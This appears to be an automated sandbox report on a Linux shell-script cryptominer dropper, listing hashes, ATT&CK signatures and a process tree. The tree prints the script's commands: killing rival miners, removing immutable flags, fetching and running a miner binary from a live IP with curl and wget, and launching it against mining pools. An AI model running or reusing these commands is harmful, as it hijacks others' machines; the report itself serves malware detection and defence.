5a7a5f792a6cb4a38d7cb0a61fa5e3e3c3dabaf11159404613c3dbb5cf13ad48

General

Target

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Size

5KB
MD5

7b72cf30ac42c20f0a14b0b87425c00a
SHA1

74402152ac0f0c9dfed6f76975080ce1d0d4584d
SHA256

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
SHA512

1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
SSDEEP

96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8

Score

7^/10

antivm

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

.kswapd.kswapd

ioc pid process

/.cache/.kswapd 853 .kswapd
/.cache/.kswapd 1029 .kswapd

ioc	pid	process
/.cache/.kswapd	853	.kswapd
/.cache/.kswapd	1029	.kswapd

Attempts to change immutable files 27 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

grepchattrgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepgrepgrepgrepgrepgrep

pid	process
807	grep
932	chattr
985	grep
997	grep
801	grep
993	grep
1005	grep
831	grep
973	grep
767	grep
771	grep
825	grep
981	grep
989	grep
759	grep
785	grep
791	grep
775	grep
780	grep
796	grep
718	chattr
818	grep
763	grep
977	grep
1001	grep
1009	grep
1013	grep

Enumerates running processes
Discovers information about currently running processes on the system
Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /usr/local/bin/.e9bFa2Eb3D9B 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

curlcurlcurl

description ioc process

File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl

description	ioc	process
File opened for modification	/usr/local/bin/.e9bFa2Eb3D9B	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads CPU attributes 1 TTPs 6 IoCs

System Information Discovery

T1082

Processes:

pspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspsgrepps

description	ioc	process
File opened for reading	/proc/942/stat	ps
File opened for reading	/proc/728/stat	ps
File opened for reading	/proc/103/stat	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/113/stat	ps
File opened for reading	/proc/41/stat	ps
File opened for reading	/proc/112/cmdline	ps
File opened for reading	/proc/649/exe	grep
File opened for reading	/proc/143/status	ps
File opened for reading	/proc/156/status	ps
File opened for reading	/proc/140/status	ps
File opened for reading	/proc/147/status	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/592/stat	ps
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/592/stat	ps
File opened for reading	/proc/929/cmdline	ps
File opened for reading	/proc/110/status	ps
File opened for reading	/proc/649/cmdline	ps
File opened for reading	/proc/962/cmdline	ps
File opened for reading	/proc/156/stat	ps
File opened for reading	/proc/745/status	ps
File opened for reading	/proc/945/status	ps
File opened for reading	/proc/275/stat	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/28/status	ps
File opened for reading	/proc/697/stat	ps
File opened for reading	/proc/103/cmdline	ps
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/112/cmdline	ps
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/721/status	ps
File opened for reading	/proc/28/status	ps
File opened for reading	/proc/304/status	ps
File opened for reading	/proc/25/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/6/status	ps
File opened for reading	/proc/696/cmdline	ps
File opened for reading	/proc/635/stat	ps
File opened for reading	/proc/274/status	ps
File opened for reading	/proc/746/stat	ps
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/303/cmdline	ps
File opened for reading	/proc/745/cmdline	ps
File opened for reading	/proc/967/stat	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/930/stat	ps
File opened for reading	/proc/25/cmdline	ps
File opened for reading	/proc/969/stat	ps
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/274/status	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/272/status	ps
File opened for reading	/proc/940/status	ps
File opened for reading	/proc/8/cmdline	ps
File opened for reading	/proc/285/stat	ps
File opened for reading	/proc/304/cmdline	ps
File opened for reading	/proc/321/status	ps
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/650/status	ps
File opened for reading	/proc/724/cmdline	ps

Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /dev/shm/.e9bFa2Eb3D9B 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description ioc process

File opened for modification /tmp/.e9bFa2Eb3D9B 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/dev/shm/.e9bFa2Eb3D9B	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

description	ioc	process
File opened for modification	/tmp/.e9bFa2Eb3D9B	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:643

/bin/uname
uname -a
2⤵
PID:647

/bin/rm
rm --help
2⤵
PID:655

/bin/grep
grep " rm does not remove dir"
2⤵
PID:656

/usr/bin/wc
wc -l
2⤵
PID:658

/usr/bin/curl
curl --help
2⤵
- Checks CPU configuration
PID:661

/bin/grep
grep -i "Dump libcurl equivalent"
2⤵
PID:662

/usr/bin/wc
wc -l
2⤵
PID:663

/usr/bin/wget
wget --version
2⤵
PID:673

/bin/grep
grep -i "wgetrc "
2⤵
PID:674

/usr/bin/wc
wc -l
2⤵
PID:675

/usr/bin/head
head /dev/urandom
2⤵
PID:680

/usr/bin/tr
tr -dc A-Za-z0-9
2⤵
PID:681

/usr/bin/shuf
shuf -i 4-16 -n 1
2⤵
PID:684

/usr/bin/head
head -c 12
2⤵
PID:682

/bin/rm
rm -f /tmp/.e9bFa2Eb3D9B
2⤵
PID:689

/bin/rm
rm -f /tmp/.e9bFa2Eb3D9B
2⤵
PID:690

/bin/rm
rm -f /usr/local/bin/.e9bFa2Eb3D9B
2⤵
PID:692

/bin/rm
rm -f /dev/shm/.e9bFa2Eb3D9B
2⤵
PID:693

/bin/rm
rm -f /.e9bFa2Eb3D9B
2⤵
PID:694

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:697

/bin/grep
grep -v grep
2⤵
PID:698

/bin/grep
grep -v defunct
2⤵
PID:699

/bin/grep
grep -v "sh "
2⤵
PID:700

/bin/grep
grep " sleep 120"
2⤵
PID:701

/usr/bin/wc
wc -l
2⤵
PID:702

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:707

/bin/grep
grep -v grep
2⤵
PID:708

/bin/grep
grep -v "sh "
2⤵
PID:709

/bin/grep
grep -v defunct
2⤵
PID:710

/bin/grep
grep " sleep 120"
2⤵
PID:711

/usr/bin/wc
wc -l
2⤵
PID:712

/bin/sleep
sleep 120
2⤵
PID:716

/bin/mkdir
mkdir -p /.cache/
2⤵
PID:717

/usr/bin/chattr
chattr -i /.cache/
2⤵
- Attempts to change immutable files
PID:718

/bin/chmod
chmod 1755 /.cache/
2⤵
PID:719

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:721

/bin/grep
grep -v l0
2⤵
PID:722

/bin/grep
grep -v eth1
2⤵
PID:723

/bin/grep
grep -v lan0
2⤵
PID:724

/bin/grep
grep -v "^-"
2⤵
PID:725

/bin/grep
grep -v eth0
2⤵
PID:726

/bin/grep
grep -v inet0
2⤵
PID:727

/bin/grep
grep -v lano
2⤵
PID:728

/bin/grep
grep -v grep
2⤵
PID:729

/bin/grep
grep -v defunct
2⤵
PID:730

/bin/grep
grep -v knthread
2⤵
PID:731

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:732

/bin/grep
grep -vi "java "
2⤵
PID:733

/bin/grep
grep -vi jenkins
2⤵
PID:734

/bin/grep
grep -vi exim
2⤵
PID:735

/usr/bin/awk
awk "{if(\$3>=54.0) print \$11}"
2⤵
PID:736

/usr/bin/head
head -n 1
2⤵
PID:737

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:739

/bin/grep
grep -v l0
2⤵
PID:740

/bin/grep
grep -v eth1
2⤵
PID:741

/bin/grep
grep -v lan0
2⤵
PID:742

/bin/grep
grep -v "^-"
2⤵
PID:743

/bin/grep
grep -v eth0
2⤵
PID:744

/bin/grep
grep -v inet0
2⤵
PID:745

/bin/grep
grep -v lano
2⤵
PID:746

/bin/grep
grep -v grep
2⤵
PID:747

/bin/grep
grep -v defunct
2⤵
PID:748

/bin/grep
grep -v python
2⤵
PID:749

/bin/grep
grep -v knthread
2⤵
PID:750

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:751

/bin/grep
grep -vi bash
2⤵
PID:752

/bin/grep
grep -vi exim
2⤵
PID:753

/usr/bin/awk
awk "{if(\$3>=0.0) print \$2}"
2⤵
PID:754

/usr/bin/uniq
uniq
2⤵
PID:755

/bin/readlink
readlink /proc/303/exe
2⤵
PID:757

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/303/exe
2⤵
- Attempts to change immutable files
PID:759

/bin/readlink
readlink /proc/304/exe
2⤵
PID:761

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/304/exe
2⤵
- Attempts to change immutable files
PID:763

/bin/readlink
readlink /proc/315/exe
2⤵
PID:765

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/315/exe
2⤵
- Attempts to change immutable files
PID:767

/bin/readlink
readlink /proc/592/exe
2⤵
PID:769

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/592/exe
2⤵
- Attempts to change immutable files
PID:771

/bin/readlink
readlink /proc/595/exe
2⤵
PID:773

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/595/exe
2⤵
- Attempts to change immutable files
PID:775

/bin/readlink
readlink /proc/635/exe
2⤵
PID:777

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/635/exe
2⤵
- Attempts to change immutable files
PID:780

/bin/readlink
readlink /proc/636/exe
2⤵
PID:783

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/636/exe
2⤵
- Attempts to change immutable files
PID:785

/bin/readlink
readlink /proc/640/cwd
2⤵
PID:787

/bin/cat
cat /proc/640/comm
2⤵
PID:789

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
2⤵
- Attempts to change immutable files
PID:791

/bin/readlink
readlink /proc/641/cwd
2⤵
PID:792

/bin/cat
cat /proc/641/comm
2⤵
PID:794

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
2⤵
- Attempts to change immutable files
PID:796

/bin/readlink
readlink /proc/642/cwd
2⤵
PID:798

/bin/cat
cat /proc/642/comm
2⤵
PID:799

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
2⤵
- Attempts to change immutable files
PID:801

/bin/readlink
readlink /proc/649/exe
2⤵
PID:804

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/649/exe
2⤵
- Attempts to change immutable files
- Reads runtime system information
PID:807

/bin/rm
rm -rf /usr/sbin/agent
2⤵
PID:813

/bin/readlink
readlink /proc/650/exe
2⤵
PID:816

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/650/exe
2⤵
- Attempts to change immutable files
PID:818

/bin/readlink
readlink /proc/651/exe
2⤵
PID:822

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/651/exe
2⤵
- Attempts to change immutable files
PID:825

/bin/readlink
readlink /proc/716/exe
2⤵
PID:828

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/716/exe
2⤵
- Attempts to change immutable files
PID:831

/bin/grep
grep x86_64
2⤵
PID:836

/usr/bin/wc
wc -l
2⤵
PID:837

/usr/bin/curl
curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
2⤵
- Checks CPU configuration
PID:840

/usr/bin/wget
wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
2⤵
PID:847

/bin/chmod
chmod +x /.cache/.kswapd
2⤵
PID:852

/bin/sleep
sleep 120
2⤵
PID:930

/bin/mkdir
mkdir -p /.cache/
2⤵
PID:931

/usr/bin/chattr
chattr -i /.cache/
2⤵
- Attempts to change immutable files
PID:932

/bin/chmod
chmod 1755 /.cache/
2⤵
PID:933

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:935

/bin/grep
grep -v eth1
2⤵
PID:937

/bin/grep
grep -v l0
2⤵
PID:936

/bin/grep
grep -v lan0
2⤵
PID:938

/bin/grep
grep -v "^-"
2⤵
PID:939

/bin/grep
grep -v eth0
2⤵
PID:940

/bin/grep
grep -v inet0
2⤵
PID:941

/bin/grep
grep -v lano
2⤵
PID:942

/bin/grep
grep -v grep
2⤵
PID:943

/bin/grep
grep -v defunct
2⤵
PID:944

/bin/grep
grep -v knthread
2⤵
PID:945

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:946

/bin/grep
grep -vi "java "
2⤵
PID:947

/bin/grep
grep -vi jenkins
2⤵
PID:948

/bin/grep
grep -vi exim
2⤵
PID:949

/usr/bin/awk
awk "{if(\$3>=54.0) print \$11}"
2⤵
PID:950

/usr/bin/head
head -n 1
2⤵
PID:951

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:953

/bin/grep
grep -v l0
2⤵
PID:954

/bin/grep
grep -v eth1
2⤵
PID:955

/bin/grep
grep -v lan0
2⤵
PID:956

/bin/grep
grep -v "^-"
2⤵
PID:957

/bin/grep
grep -v eth0
2⤵
PID:958

/bin/grep
grep -v inet0
2⤵
PID:959

/bin/grep
grep -v lano
2⤵
PID:960

/bin/grep
grep -v grep
2⤵
PID:961

/bin/grep
grep -v defunct
2⤵
PID:962

/bin/grep
grep -v python
2⤵
PID:963

/bin/grep
grep -v knthread
2⤵
PID:964

/bin/grep
grep -vi aaaaaaaaaa
2⤵
PID:965

/bin/grep
grep -vi bash
2⤵
PID:966

/bin/grep
grep -vi exim
2⤵
PID:967

/usr/bin/awk
awk "{if(\$3>=0.0) print \$2}"
2⤵
PID:968

/usr/bin/uniq
uniq
2⤵
PID:969

/bin/readlink
readlink /proc/303/exe
2⤵
PID:971

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/303/exe
2⤵
- Attempts to change immutable files
PID:973

/bin/readlink
readlink /proc/304/exe
2⤵
PID:975

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/304/exe
2⤵
- Attempts to change immutable files
PID:977

/bin/readlink
readlink /proc/315/exe
2⤵
PID:979

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/315/exe
2⤵
- Attempts to change immutable files
PID:981

/bin/readlink
readlink /proc/592/exe
2⤵
PID:983

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/592/exe
2⤵
- Attempts to change immutable files
PID:985

/bin/readlink
readlink /proc/595/exe
2⤵
PID:987

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/595/exe
2⤵
- Attempts to change immutable files
PID:989

/bin/readlink
readlink /proc/640/cwd
2⤵
PID:990

/bin/cat
cat /proc/640/comm
2⤵
PID:991

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
2⤵
- Attempts to change immutable files
PID:993

/bin/readlink
readlink /proc/641/cwd
2⤵
PID:994

/bin/cat
cat /proc/641/comm
2⤵
PID:995

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
2⤵
- Attempts to change immutable files
PID:997

/bin/readlink
readlink /proc/642/cwd
2⤵
PID:998

/bin/cat
cat /proc/642/comm
2⤵
PID:999

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
2⤵
- Attempts to change immutable files
PID:1001

/bin/readlink
readlink /proc/905/cwd
2⤵
PID:1002

/bin/cat
cat /proc/905/comm
2⤵
PID:1003

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" //kworker/u2:2
2⤵
- Attempts to change immutable files
PID:1005

/bin/readlink
readlink /proc/928/exe
2⤵
PID:1007

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/928/exe
2⤵
- Attempts to change immutable files
PID:1009

/bin/readlink
readlink /proc/930/exe
2⤵
PID:1011

/bin/grep
grep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe
2⤵
- Attempts to change immutable files
PID:1013

/usr/bin/cut
cut -c 1-32
2⤵
PID:1017

/usr/bin/md5sum
md5sum /.cache/.kswapd
2⤵
PID:1016

/usr/bin/md5sum
md5sum /.cache/.kswapd
2⤵
PID:1019

/usr/bin/cut
cut -c 1-32
2⤵
PID:1020

/bin/grep
grep x86_64
2⤵
PID:1023

/usr/bin/wc
wc -l
2⤵
PID:1024

/usr/bin/curl
curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
2⤵
- Checks CPU configuration
PID:1026

/usr/bin/wget
wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
2⤵
PID:1027

/bin/chmod
chmod +x /.cache/.kswapd
2⤵
PID:1028

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
- Executes dropped EXE
PID:853

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
- Executes dropped EXE
PID:1029

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.e9bFa2Eb3D9B
Filesize
13B

MD5
119e988d14765ff8d6f26841f49eaa46

SHA1
12f83e1dec392d08d17703f0f091631ad12524b6

SHA256
7ebef7ecc2d830825ff28a987c274b65628ffb3bc8c8e50d5f084bbb6864af34

SHA512
a93a33d7079111b8aabc3029ad1a836a1a11a44351d9584c5e2d4c236f1dc87cbe2eb28ac56485e334491da0650618da001fb1fb76f9fa90aa9e4d5af432603e

Download Submit
memory/1027-1-0xb6bb3000-0xb6bc4044-memory.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads